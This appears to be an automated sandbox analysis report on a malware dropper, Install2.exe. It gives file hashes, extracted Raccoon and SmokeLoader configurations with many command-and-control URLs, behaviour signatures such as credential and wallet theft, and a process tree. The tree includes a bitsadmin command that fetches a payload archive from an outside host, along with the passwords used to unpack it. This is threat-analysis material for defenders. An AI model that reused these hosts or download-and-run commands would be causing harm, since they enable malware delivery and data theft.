Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1777s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-04-2021 13:35

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 43 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1020
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1324
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1904
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2464
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2756
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2744
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2664
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2432
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1428
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1204
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1076
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:924
                      • C:\Users\Admin\AppData\Roaming\cftstgg
                        C:\Users\Admin\AppData\Roaming\cftstgg
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1044
                        • C:\Users\Admin\AppData\Roaming\cftstgg
                          C:\Users\Admin\AppData\Roaming\cftstgg
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:3160
                      • C:\Users\Admin\AppData\Roaming\gbtstgg
                        C:\Users\Admin\AppData\Roaming\gbtstgg
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2376
                      • C:\Users\Admin\AppData\Roaming\cftstgg
                        C:\Users\Admin\AppData\Roaming\cftstgg
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1268
                        • C:\Users\Admin\AppData\Roaming\cftstgg
                          C:\Users\Admin\AppData\Roaming\cftstgg
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:2372
                      • C:\Users\Admin\AppData\Roaming\gbtstgg
                        C:\Users\Admin\AppData\Roaming\gbtstgg
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4104
                      • C:\Users\Admin\AppData\Roaming\cftstgg
                        C:\Users\Admin\AppData\Roaming\cftstgg
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1084
                        • C:\Users\Admin\AppData\Roaming\cftstgg
                          C:\Users\Admin\AppData\Roaming\cftstgg
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5752
                      • C:\Users\Admin\AppData\Roaming\gbtstgg
                        C:\Users\Admin\AppData\Roaming\gbtstgg
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4516
                    • C:\Users\Admin\AppData\Local\Temp\Install2.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1440
                      • C:\Users\Admin\AppData\Local\Temp\is-2TMRK.tmp\Install2.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-2TMRK.tmp\Install2.tmp" /SL5="$60060,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1084
                        • C:\Users\Admin\AppData\Local\Temp\is-AVT5R.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-AVT5R.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2096
                          • C:\Program Files\Windows Defender\ZMLEZGIGTI\ultramediaburner.exe
                            "C:\Program Files\Windows Defender\ZMLEZGIGTI\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2892
                            • C:\Users\Admin\AppData\Local\Temp\is-NNB2Q.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-NNB2Q.tmp\ultramediaburner.tmp" /SL5="$70030,281924,62464,C:\Program Files\Windows Defender\ZMLEZGIGTI\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:2256
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:1920
                          • C:\Users\Admin\AppData\Local\Temp\8a-9b79e-40d-26985-a1710800bb208\SHutyxegeky.exe
                            "C:\Users\Admin\AppData\Local\Temp\8a-9b79e-40d-26985-a1710800bb208\SHutyxegeky.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3940
                          • C:\Users\Admin\AppData\Local\Temp\a4-1d46f-91b-b92be-a106f666ad843\Gazhilahycae.exe
                            "C:\Users\Admin\AppData\Local\Temp\a4-1d46f-91b-b92be-a106f666ad843\Gazhilahycae.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2524
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rxopxqce.tdi\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4312
                              • C:\Users\Admin\AppData\Local\Temp\rxopxqce.tdi\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\rxopxqce.tdi\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4516
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mv5fmhlm.pvl\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4552
                              • C:\Users\Admin\AppData\Local\Temp\mv5fmhlm.pvl\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\mv5fmhlm.pvl\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:4732
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                  • Loads dropped DLL
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:4936
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3cqmtm5l.nv5\md1_1eaf.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4328
                              • C:\Users\Admin\AppData\Local\Temp\3cqmtm5l.nv5\md1_1eaf.exe
                                C:\Users\Admin\AppData\Local\Temp\3cqmtm5l.nv5\md1_1eaf.exe
                                6⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                PID:4860
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lce2ce1v.m1i\askinstall39.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3336
                              • C:\Users\Admin\AppData\Local\Temp\lce2ce1v.m1i\askinstall39.exe
                                C:\Users\Admin\AppData\Local\Temp\lce2ce1v.m1i\askinstall39.exe
                                6⤵
                                • Executes dropped EXE
                                • Modifies system certificate store
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:3828
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c taskkill /f /im chrome.exe
                                  7⤵
                                    PID:5096
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im chrome.exe
                                      8⤵
                                      • Kills process with taskkill
                                      PID:4112
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdlr3oc0.z5i\y1.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3924
                                • C:\Users\Admin\AppData\Local\Temp\cdlr3oc0.z5i\y1.exe
                                  C:\Users\Admin\AppData\Local\Temp\cdlr3oc0.z5i\y1.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3020
                                  • C:\Users\Admin\AppData\Local\Temp\Ipum93NOvg.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Ipum93NOvg.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:5264
                                    • C:\Users\Admin\AppData\Roaming\1619453678549.exe
                                      "C:\Users\Admin\AppData\Roaming\1619453678549.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619453678549.txt"
                                      8⤵
                                      • Executes dropped EXE
                                      PID:4980
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Ipum93NOvg.exe"
                                      8⤵
                                        PID:5424
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 3
                                          9⤵
                                          • Runs ping.exe
                                          PID:4752
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cdlr3oc0.z5i\y1.exe"
                                      7⤵
                                        PID:5716
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /T 10 /NOBREAK
                                          8⤵
                                          • Delays execution with timeout.exe
                                          PID:4372
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0e3jgm2h.zer\SunLabsPlayer.exe /S & exit
                                    5⤵
                                      PID:5044
                                      • C:\Users\Admin\AppData\Local\Temp\0e3jgm2h.zer\SunLabsPlayer.exe
                                        C:\Users\Admin\AppData\Local\Temp\0e3jgm2h.zer\SunLabsPlayer.exe /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in Program Files directory
                                        PID:5164
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                          7⤵
                                            PID:5840
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                            7⤵
                                              PID:6072
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4108
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:1268
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5420
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:4736
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                      7⤵
                                                      • Checks for any installed AV software in registry
                                                      PID:5464
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                      7⤵
                                                      • Download via BitsAdmin
                                                      PID:1648
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peMb4BpZVBNLXLM1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:4344
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pMlM8v3G9Pha8YLt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4100
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:1248
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5072
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4104
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4896
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5248
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gqAAFX\gqAAFX.dll" gqAAFX
                                                                7⤵
                                                                • Loads dropped DLL
                                                                PID:6032
                                                                • C:\Windows\system32\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gqAAFX\gqAAFX.dll" gqAAFX
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  • Drops file in System32 directory
                                                                  PID:2776
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:4992
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:4972
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Blocklisted process makes network request
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:5072
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:4256
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst1B99.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5492
                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:5724
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbhabaxs.jry\inst.exe & exit
                                                                  5⤵
                                                                    PID:4772
                                                                    • C:\Users\Admin\AppData\Local\Temp\fbhabaxs.jry\inst.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\fbhabaxs.jry\inst.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:5412
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n50ycmz3.hzl\GcleanerWW.exe /mixone & exit
                                                                    5⤵
                                                                      PID:5280
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vn5kgxtl.pde\toolspab1.exe & exit
                                                                      5⤵
                                                                        PID:5480
                                                                        • C:\Users\Admin\AppData\Local\Temp\vn5kgxtl.pde\toolspab1.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\vn5kgxtl.pde\toolspab1.exe
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:5704
                                                                          • C:\Users\Admin\AppData\Local\Temp\vn5kgxtl.pde\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\vn5kgxtl.pde\toolspab1.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:5712
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\imszcqle.cfh\app.exe /8-2222 & exit
                                                                        5⤵
                                                                          PID:2132
                                                                          • C:\Users\Admin\AppData\Local\Temp\imszcqle.cfh\app.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\imszcqle.cfh\app.exe /8-2222
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4368
                                                                            • C:\Users\Admin\AppData\Local\Temp\imszcqle.cfh\app.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\imszcqle.cfh\app.exe" /8-2222
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies data under HKEY_USERS
                                                                              PID:5900
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\axge4xje.u0o\c7ae36fa.exe & exit
                                                                          5⤵
                                                                            PID:5456
                                                                            • C:\Users\Admin\AppData\Local\Temp\axge4xje.u0o\c7ae36fa.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\axge4xje.u0o\c7ae36fa.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5664
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                    1⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1928
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Checks processor information in registry
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:4348
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                    1⤵
                                                                    • Drops file in Windows directory
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4568
                                                                  • C:\Windows\system32\browser_broker.exe
                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    PID:4844
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4200
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    PID:5116
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    PID:5128
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                    1⤵
                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                    PID:5048
                                                                  • C:\Users\Admin\AppData\Local\Temp\13B3.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\13B3.exe
                                                                    1⤵
                                                                      PID:5072
                                                                    • C:\Users\Admin\AppData\Local\Temp\17BB.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\17BB.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:5600
                                                                    • C:\Users\Admin\AppData\Local\Temp\B5C1.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\B5C1.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:792
                                                                      • C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                        C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
